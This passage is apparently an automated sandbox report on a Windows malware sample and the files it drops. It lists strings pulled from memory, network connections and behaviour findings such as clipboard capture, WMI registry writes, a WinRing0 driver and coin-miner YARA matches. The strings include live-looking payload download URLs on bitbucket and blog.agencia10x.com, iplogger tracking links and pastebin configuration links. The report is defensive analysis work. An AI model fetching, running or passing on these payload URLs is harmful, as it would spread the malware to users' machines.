Source: 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: evs.exe, evs.exe, 00000016.00000000.419601888.000000000040A000.00000008.00020000.sdmp, evs.exe.4.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: nulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmp, evs.exe, 00000016.00000000.419601888.000000000040A000.00000008.00020000.sdmp, evs.exe.4.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: 8TD8GfTtaW.exe	String found in binary or memory: http://ocsp.digicert.com0H
Source: 8TD8GfTtaW.exe	String found in binary or memory: http://ocsp.digicert.com0I
Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0K
Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exe	String found in binary or memory: http://ocsp.digicert.com0P
Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0R
Source: 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exe	String found in binary or memory: http://ocsp.thawte.com0
Source: 8TD8GfTtaW.exe	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 8TD8GfTtaW.exe	String found in binary or memory: http://s.symcd.com06
Source: nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmp	String found in binary or memory: http://s3-1-w.amazonaws.com
Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org
Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/CONTEXT.Models.Enums
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/0
Source: nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/Complete
Source: nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.468811238.0000000003805000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTask
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTaskResponse
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettings
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsResponse
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/GetTasks
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/GetTasksResponse
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.471019323.0000000003A19000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfo
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfoResponse
Source: 8TD8GfTtaW.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 8TD8GfTtaW.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 8TD8GfTtaW.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: 8TD8GfTtaW.exe	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: nulhfhsi.exe	String found in binary or memory: http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoip
Source: nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp	String found in binary or memory: http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipsecuritywaves-exchange
Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb
Source: nulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp	String found in binary or memory: https://api.ipify.org
Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com
Source: nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/e9515cd4-e4be-
Source: nulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org
Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/mminminminmin05/testtest/downloads/flesh.exe
Source: 8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp	String found in binary or memory: https://blog.agencia10x.com
Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp	String found in binary or memory: https://blog.agencia10x.com/Done.exe
Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.273251560.0000000003200000.00000004.00000001.sdmp	String found in binary or memory: https://blog.agencia10x.com/dance.exe
Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmp	String found in binary or memory: https://blog.agencia10x.com/mex.exe
Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp	String found in binary or memory: https://blog.agencia10x.com4
Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 8TD8GfTtaW.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: 8TD8GfTtaW.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: 8TD8GfTtaW.exe	String found in binary or memory: https://d.symcb.com/rpa0.
Source: nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmp	String found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabt
Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nulhfhsi.exe	String found in binary or memory: https://icanhazip.com
Source: nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp	String found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
Source: nulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org
Source: powershell.exe, 00000020.00000002.502282965.0000000000B40000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1n6Zw7
Source: powershell.exe, 00000020.00000002.507518014.0000000000DD0000.00000004.00000040.sdmp	String found in binary or memory: https://iplogger.org/1n6Zw7C:o9P
Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.268341781.0000000001392000.00000020.00020000.sdmp	String found in binary or memory: https://iplogger.org/1r2et7
Source: lxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmp	String found in binary or memory: https://iplogger.org/1tsef7
Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/WmBNYXYN
Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/bnxCb5RP
Source: 8TD8GfTtaW.exe, 00000000.00000002.268341781.0000000001392000.00000020.00020000.sdmp	String found in binary or memory: https://pastebin.com/raw/bnxCb5RPChttps://pastebin.com/raw/WmBNYXYN&
Source: 8TD8GfTtaW.exe, 00000000.00000002.273278567.0000000003208000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com4
Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.273251560.0000000003200000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
Source: nulhfhsi.exe	String found in binary or memory: https://wtfismyip.com/text
Source: 8TD8GfTtaW.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.51:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.107.52:443 -> 192.168.2.5:49741 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\evs.exe

Code function: 22_2_00405252 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

22_2_00405252

Creates a DirectInput object (often for capturing keystrokes)

Source: jo.exe, 0000001F.00000002.505910725.0000000000AAA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Creates a window with clipboard capturing capabilities

Source: C:\Users\user\AppData\Local\Temp\revs.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary:

PE file contains section with special chars

Source: 8TD8GfTtaW.exe	Static PE information: section name:
Source: 8TD8GfTtaW.exe	Static PE information: section name:
Source: 8TD8GfTtaW.exe	Static PE information: section name:
Source: nulhfhsi.exe.0.dr	Static PE information: section name:
Source: nulhfhsi.exe.0.dr	Static PE information: section name:
Source: nulhfhsi.exe.0.dr	Static PE information: section name:
Source: lxoqz3o0.exe.0.dr	Static PE information: section name:
Source: lxoqz3o0.exe.0.dr	Static PE information: section name:
Source: lxoqz3o0.exe.0.dr	Static PE information: section name:
Source: RantimeBroker.exe.6.dr	Static PE information: section name:
Source: RantimeBroker.exe.6.dr	Static PE information: section name:
Source: RantimeBroker.exe.6.dr	Static PE information: section name:
Source: Chrome updater.exe.25.dr	Static PE information: section name:
Source: Chrome updater.exe.25.dr	Static PE information: section name:
Source: Chrome updater.exe.25.dr	Static PE information: section name:

Writes or reads registry keys via WMI

Source: C:\Users\user\AppData\Local\Temp\jo.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\AppData\Local\Temp\jo.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\jo.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\jo.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Users\user\AppData\Local\Temp\jo.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\jo.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\jo.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00401544 GetProcAddress,NtCreateSection,memset,		31_2_00401544
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00401502 NtMapViewOfSection,		31_2_00401502
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_008B7507 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,		31_2_008B7507
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_008BB2F1 NtQueryVirtualMemory,		31_2_008BB2F1

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\evs.exe

Code function: 22_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

22_2_00403248

Creates driver files

Source: C:\Users\user\AppData\Local\lxoqz3o0.exe

File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Code function: 4_2_0372C3D0		4_2_0372C3D0
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Code function: 4_2_0372EC5A		4_2_0372EC5A
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_008BB0CC		31_2_008BB0CC
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_008B23FC		31_2_008B23FC
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_008B936B		31_2_008B936B
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_004365D0		31_2_004365D0
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00417130		31_2_00417130
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00416350		31_2_00416350
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_0042A330		31_2_0042A330

PE / OLE file has an invalid certificate

Source: 8TD8GfTtaW.exe

Static PE information: invalid certificate

PE file contains more sections than normal

Source: nulhfhsi.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: cpu.exe.6.dr	Static PE information: Number of sections : 13 > 10

PE file contains strange resources

Source: nulhfhsi.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Chrome updater.exe.25.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Chrome updater.exe.25.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: 8TD8GfTtaW.exe	Binary or memory string: OriginalFilename vs 8TD8GfTtaW.exe
Source: 8TD8GfTtaW.exe, 00000000.00000002.268352311.0000000001394000.00000020.00020000.sdmp	Binary or memory string: OriginalFilenameLoader.exeL vs 8TD8GfTtaW.exe
Source: 8TD8GfTtaW.exe, 00000000.00000002.274119468.0000000006140000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 8TD8GfTtaW.exe
Source: 8TD8GfTtaW.exe, 00000000.00000002.274390179.0000000006240000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs 8TD8GfTtaW.exe
Source: 8TD8GfTtaW.exe, 00000000.00000002.274390179.0000000006240000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 8TD8GfTtaW.exe
Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs 8TD8GfTtaW.exe
Source: 8TD8GfTtaW.exe	Binary or memory string: OriginalFilenameLoader.exeL vs 8TD8GfTtaW.exe

Uses 32bit PE files

Source: 8TD8GfTtaW.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000004.00000003.395495832.0000000006A8E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000004.00000003.395598364.0000000006AAB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000010.00000002.502678236.000002ABFF250000.00000004.00000020.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000004.00000002.476458617.0000000004A5A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000010.00000002.502700687.000002ABFF257000.00000004.00000020.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000004.00000003.395324200.0000000006A7E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: Process Memory Space: conhost.exe PID: 5544, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: Process Memory Space: RantimeBroker.exe PID: 6352, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 37.2.Chrome updater.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 25.2.revs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =

PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)

Source: Chrome updater.exe.25.dr

Static PE information: Section: ZLIB complexity 0.995197233607

Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)

Source: WinRing0x64.sys.6.dr

Binary string: \Device\WinRing0_1_2_0

Classification label

Source: classification engine

Classification label: mal100.troj.adwa.spyw.evad.mine.winEXE@37/49@16/12

Contains functionality to adjust token privileges (e.g. debug / backup)

Source: C:\Users\user\AppData\Local\Temp\evs.exe

